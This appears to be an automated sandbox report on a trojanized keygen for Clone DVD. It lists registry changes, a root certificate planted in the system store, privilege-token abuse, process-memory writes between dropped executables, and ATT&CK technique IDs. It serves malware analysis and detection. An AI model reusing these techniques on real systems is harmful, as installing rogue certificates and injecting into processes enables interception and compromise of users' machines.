Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b35b13209722d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000044bb6d83f67c67cd5ac2068c294bb3734ca17e26e9da5913037a0035f3b893eff7a8849829d5422c555b8f36d4a4792e2335e38ed73f33b93dec83b48882e1f8e3ea7a54212e0522afeffdd0bf060411f5ad606b0af55eca236b8ce9cf25a6085ea2de582a28f7b637a1996f6112bc4fa02bf5c4e39bc8431a17d895754108b764eed54b976327bbfe8f1ca2c9667dca68ce5aac8bd37ddd4b1057d73a762ad3adef2e31f17f47b3fddb4b6307a4a74e03b6dd7c763c683d1976e49001649c33c3c5a318ca1ce2d039a434c4ff6afd63b902e1709d75233b1f6990a21cab19030d91aa194ddba0fdd4098b32445a7aab81d4488883204c323a097ef315ebd8ab84714aa0375a7bf51e2ca2781d12aecdf84bc4ba11dc87626d765f478ac3ab4ce286f409363afb73c12b2bf8b233cefa3d87567da048fe652bd057e986d58ec02bf1808fba1bed675d282cfb585ef3f57ba83c972f0672af20376624bec0d1347ad0fb87e09d0b45fb4134d7da31d3b585cd324546b5052028cb208ac7245d4dd744bfeba260af5c5d98a9d9744eeb93aa183aafc5f4fcaa18f8ff7ede8e00949a5a9c1ccc60	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{19127319-7D39-4E78-9581-EE42621C513F}"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

askinstall20.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2340 PING.EXE
3348 PING.EXE

pid	process
2340	PING.EXE
3348	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	412	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	415	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	416	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	421	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	119	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setups.tmpmultitimer.exe

pid	process
216	setups.tmp
216	setups.tmp
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe
2056	multitimer.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

4392 MicrosoftEdgeCP.exe
4392 MicrosoftEdgeCP.exe

pid	process
4392	MicrosoftEdgeCP.exe
4392	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

Setup.exeaskinstall20.exemultitimer.exetaskkill.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exemsiexec.exemd2_2efs.exevpn.tmppowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1616	Setup.exe
Token: SeCreateTokenPrivilege	2360	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	2360	askinstall20.exe
Token: SeLockMemoryPrivilege	2360	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	2360	askinstall20.exe
Token: SeMachineAccountPrivilege	2360	askinstall20.exe
Token: SeTcbPrivilege	2360	askinstall20.exe
Token: SeSecurityPrivilege	2360	askinstall20.exe
Token: SeTakeOwnershipPrivilege	2360	askinstall20.exe
Token: SeLoadDriverPrivilege	2360	askinstall20.exe
Token: SeSystemProfilePrivilege	2360	askinstall20.exe
Token: SeSystemtimePrivilege	2360	askinstall20.exe
Token: SeProfSingleProcessPrivilege	2360	askinstall20.exe
Token: SeIncBasePriorityPrivilege	2360	askinstall20.exe
Token: SeCreatePagefilePrivilege	2360	askinstall20.exe
Token: SeCreatePermanentPrivilege	2360	askinstall20.exe
Token: SeBackupPrivilege	2360	askinstall20.exe
Token: SeRestorePrivilege	2360	askinstall20.exe
Token: SeShutdownPrivilege	2360	askinstall20.exe
Token: SeDebugPrivilege	2360	askinstall20.exe
Token: SeAuditPrivilege	2360	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	2360	askinstall20.exe
Token: SeChangeNotifyPrivilege	2360	askinstall20.exe
Token: SeRemoteShutdownPrivilege	2360	askinstall20.exe
Token: SeUndockPrivilege	2360	askinstall20.exe
Token: SeSyncAgentPrivilege	2360	askinstall20.exe
Token: SeEnableDelegationPrivilege	2360	askinstall20.exe
Token: SeManageVolumePrivilege	2360	askinstall20.exe
Token: SeImpersonatePrivilege	2360	askinstall20.exe
Token: SeCreateGlobalPrivilege	2360	askinstall20.exe
Token: 31	2360	askinstall20.exe
Token: 32	2360	askinstall20.exe
Token: 33	2360	askinstall20.exe
Token: 34	2360	askinstall20.exe
Token: 35	2360	askinstall20.exe
Token: SeDebugPrivilege	4668	multitimer.exe
Token: SeDebugPrivilege	748	taskkill.exe
Token: SeDebugPrivilege	5092	MicrosoftEdge.exe
Token: SeDebugPrivilege	5092	MicrosoftEdge.exe
Token: SeDebugPrivilege	5092	MicrosoftEdge.exe
Token: SeDebugPrivilege	5092	MicrosoftEdge.exe
Token: SeDebugPrivilege	4468	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4468	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4468	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4468	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2056	multitimer.exe
Token: SeLockMemoryPrivilege	4516	msiexec.exe
Token: SeLockMemoryPrivilege	4516	msiexec.exe
Token: SeManageVolumePrivilege	5052	md2_2efs.exe
Token: SeDebugPrivilege	5620	vpn.tmp
Token: SeDebugPrivilege	5620	vpn.tmp
Token: SeDebugPrivilege	5204	powershell.exe
Token: SeDebugPrivilege	5544	powershell.exe

Suspicious use of FindShellTrayWindow 39 IoCs

Processes:

Setup3310.tmpIBInstaller_97039.tmpicmnqirhger.exex1fachb2j4i.tmpvpn.tmpvict.tmp

pid	process
1012	Setup3310.tmp
2332	IBInstaller_97039.tmp
5264	icmnqirhger.exe
4660	x1fachb2j4i.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
5620	vpn.tmp
1296	vict.tmp

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

setups.exesetups.tmpMicrosoftEdge.exeMicrosoftEdgeCP.exex1fachb2j4i.exex1fachb2j4i.tmpSetup3310.exevict.exeSetup3310.tmpIBInstaller_97039.exevict.tmp5p0hooqkyn3.exeIBInstaller_97039.tmpchrome_proxy.exeapp.exevpn.exevpn.tmpwinlthsth.exewinhost.exe

pid	process
4664	setups.exe
216	setups.tmp
5092	MicrosoftEdge.exe
4392	MicrosoftEdgeCP.exe
4392	MicrosoftEdgeCP.exe
1572	x1fachb2j4i.exe
4660	x1fachb2j4i.tmp
3004	Setup3310.exe
4608	vict.exe
1012	Setup3310.tmp
2424	IBInstaller_97039.exe
1296	vict.tmp
4240	5p0hooqkyn3.exe
2332	IBInstaller_97039.tmp
5408	chrome_proxy.exe
5448	app.exe
5508	vpn.exe
5620	vpn.tmp
5816	winlthsth.exe
6100	winhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Clone.Dvd.2.9.1.0.keygen.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exeSetup.exesetups.exeaskinstall20.execmd.exemultitimer.exemultitimer.exeMicrosoftEdgeCP.exefile.exe

description	pid	process	target process
PID 4688 wrote to memory of 3116	4688	Clone.Dvd.2.9.1.0.keygen.exe	cmd.exe
PID 4688 wrote to memory of 3116	4688	Clone.Dvd.2.9.1.0.keygen.exe	cmd.exe
PID 4688 wrote to memory of 3116	4688	Clone.Dvd.2.9.1.0.keygen.exe	cmd.exe
PID 3116 wrote to memory of 3492	3116	cmd.exe	keygen-pr.exe
PID 3116 wrote to memory of 3492	3116	cmd.exe	keygen-pr.exe
PID 3116 wrote to memory of 3492	3116	cmd.exe	keygen-pr.exe
PID 3116 wrote to memory of 4060	3116	cmd.exe	keygen-step-1.exe
PID 3116 wrote to memory of 4060	3116	cmd.exe	keygen-step-1.exe
PID 3116 wrote to memory of 4060	3116	cmd.exe	keygen-step-1.exe
PID 3116 wrote to memory of 3504	3116	cmd.exe	keygen-step-3.exe
PID 3116 wrote to memory of 3504	3116	cmd.exe	keygen-step-3.exe
PID 3116 wrote to memory of 3504	3116	cmd.exe	keygen-step-3.exe
PID 3116 wrote to memory of 4428	3116	cmd.exe	keygen-step-4.exe
PID 3116 wrote to memory of 4428	3116	cmd.exe	keygen-step-4.exe
PID 3116 wrote to memory of 4428	3116	cmd.exe	keygen-step-4.exe
PID 3492 wrote to memory of 1400	3492	keygen-pr.exe	key.exe
PID 3492 wrote to memory of 1400	3492	keygen-pr.exe	key.exe
PID 3492 wrote to memory of 1400	3492	keygen-pr.exe	key.exe
